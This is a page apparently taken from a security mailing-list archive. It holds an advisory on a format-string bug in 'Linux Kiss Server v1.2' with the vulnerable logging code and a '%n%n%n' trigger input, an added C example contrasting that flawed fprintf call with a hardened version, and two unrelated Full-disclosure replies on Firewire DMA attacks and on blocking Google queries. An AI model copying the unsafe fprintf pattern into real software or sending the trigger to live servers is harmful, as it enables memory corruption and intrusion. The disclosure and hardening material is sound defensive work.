
 From: [EMAIL PROTECTED]

Site: http://www.vashnukad.com

Application: Linux Kiss Server v1.2

Type: Format strings

Priority: Medium

Patch available: No


The Linux Kiss Server contains a format strings vulnerability that, if run
in foreground mode, can be leveraged for access. The vulnerability is
demonstrated in the code below:

Function log_message():

  if (background_mode == 0)
  {
    if (type == 'l')
      fprintf(stdout, log_msg);   /* log_msg is used as the format string */

    if (type == 'e')
      fprintf(stderr, log_msg);   /* same here */

    free(log_msg);
  }


Function kiss_parse_cmd():

  /* check full command name */
  if (strncmp(cmd, buf, cmd_len))
  {
     asprintf(&log_msg, "unknow command: `%s'", buf);   /* buf is the client-supplied command */
     log_message(log_msg, 'e');
     goto error;
  }
  buf += cmd_len;


So putting something like %n%n%n in 'buf' you can trigger the vulnerability.


-- 

Name: Vashnukad

E-mail: [EMAIL PROTECTED]

Site: http://www.vashnukad.com




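The defect the advisory above quotes, reconstructed as an added example (this is not the Kiss Server's own code): the vulnerable logging shape beside a hardened one, a counterpart of the asprintf() call that builds the message from the client's command, and a small directive counter that is handy in code review or when auditing what reached a log sink. The function names (kiss_format_unknown_cmd, log_message_vulnerable, log_message_fixed, render_log_line, count_format_directives) and the "%n%n%n" input are hypothetical, chosen to match the shape the advisory describes.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example reconstructing the logging path the advisory describes.
 * All names here are hypothetical, not the Kiss Server's identifiers. */

static int background_mode = 0;   /* 0 = foreground, the branch the advisory shows */

/* Counterpart of the advisory's asprintf(): the client-supplied command is
 * copied into a heap string. Nothing is wrong yet; the bug is what the
 * caller later does with the result. */
char *kiss_format_unknown_cmd(const char *buf)
{
    const char *prefix = "unknow command: `";
    size_t len = strlen(prefix) + strlen(buf) + 2;   /* closing quote + NUL */
    char *msg = malloc(len);
    if (msg == NULL)
        return NULL;
    snprintf(msg, len, "%s%s'", prefix, buf);
    return msg;
}

/* Shape of the vulnerable code: log_msg is the FORMAT argument, so every
 * %-directive the client put into the command is interpreted by fprintf.
 * Kept for contrast only; nothing below calls it with untrusted data. */
void log_message_vulnerable(char *log_msg, char type)
{
    if (background_mode == 0) {
        if (type == 'l')
            fprintf(stdout, log_msg);
        if (type == 'e')
            fprintf(stderr, log_msg);
        free(log_msg);
    }
}

/* Hardened form: the format string is a literal and log_msg is passed as
 * data, so %n, %x and friends in the message are printed, not evaluated.
 * free() is unconditional so the background branch cannot leak the buffer. */
void log_message_fixed(char *log_msg, char type)
{
    if (background_mode == 0) {
        FILE *out = (type == 'e') ? stderr : stdout;
        fprintf(out, "%s", log_msg);
    }
    free(log_msg);
}

/* Same hardening, rendered into a caller buffer so the result can be
 * inspected: returns the length of the line that would be logged, or -1. */
int render_log_line(const char *buf, char *out, size_t outlen)
{
    char *msg = kiss_format_unknown_cmd(buf);
    if (msg == NULL)
        return -1;
    int n = snprintf(out, outlen, "%s", msg);   /* literal format, data as argument */
    free(msg);
    return n;
}

/* Triage check for a review or a log audit: how many conversion directives
 * would printf interpret in this string? "%%" is a literal percent sign
 * and is not counted; a dangling trailing '%' is counted, since printf
 * would misbehave on it as well. */
int count_format_directives(const char *s)
{
    int count = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* escaped percent sign, skip both characters */
            p++;
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    /* Constructed input in the shape the advisory describes. */
    const char *attacker_buf = "%n%n%n";
    char line[128];

    printf("directives in input: %d\n", count_format_directives(attacker_buf));
    render_log_line(attacker_buf, line, sizeof line);
    printf("hardened log line:   %s\n", line);   /* the %n sequences appear literally */

    log_message_fixed(kiss_format_unknown_cmd(attacker_buf), 'e');
    return 0;
}
```

Compiling with `-Wformat -Wformat-security` makes gcc flag the vulnerable form ("format not a string literal and no format arguments") while the fixed form passes cleanly, which is the cheapest regression check for this bug class across a code base.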

Re: [Full-disclosure] Firewire Attack on Windows Vista

2008-03-05 Thread Tonnerre Lombard
Salut, Roger,

On Wed, 5 Mar 2008 16:30:35 -0500, Roger A. Grimes wrote:
 As somewhat indicated in the paper itself, these types of physical
 DMA attacks are possible against any PC-based OS, not just Windows.
 If that's true, why is the paper titled around Windows Vista?

That's very easy: because the specific attack was against Windows
Vista's activation mechanism.

The deficiencies of Firewire with regard to direct memory access have
been known for quite a while now. The purpose of the referenced attack
was specific to Windows Vista. It is of course also possible though to
steal GnuPG keys from the memory of a Solaris machine, of course,
that's in the nature of the beast, but this is not relevant to the
specific attack mentioned here.

May I also add that I am actually aware of patches from vendors which
can render this attack ineffective for most other OSes (Solaris, Linux,
etc.) - as far as I know, though, there is no such patch for Windows?
That might also be a reason why this attack was created and published
in the first place - like I said, the attack vector has been known for
ages now.

 [Disclaimer: I'm a full-time Microsoft employee.] 

Hi there. ;-)

Tonnerre
-- 
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:    +41 61 333 80 33        Güterstrasse 86
Fax:    +41 61 383 14 67        4053 Basel
Web:    www.sygroup.ch          [EMAIL PROTECTED]



Re: [Full-disclosure] Goolag Perk and Annoyance

2008-03-05 Thread Vladimir Vitkov
 Within most corporate networks, what effective methods can be used,
 from the network's perspective, to block mass Google queries?

Probably you are best off with some kind of rate limiting and/or content inspection
of http traffic.

Probably some payload injection in the flow and blocking the user based on
your statistics ...



-- 
BOFH excuse #218:

The UPS doesn't have a battery backup.

--
Regards
Vladimir Vitkov

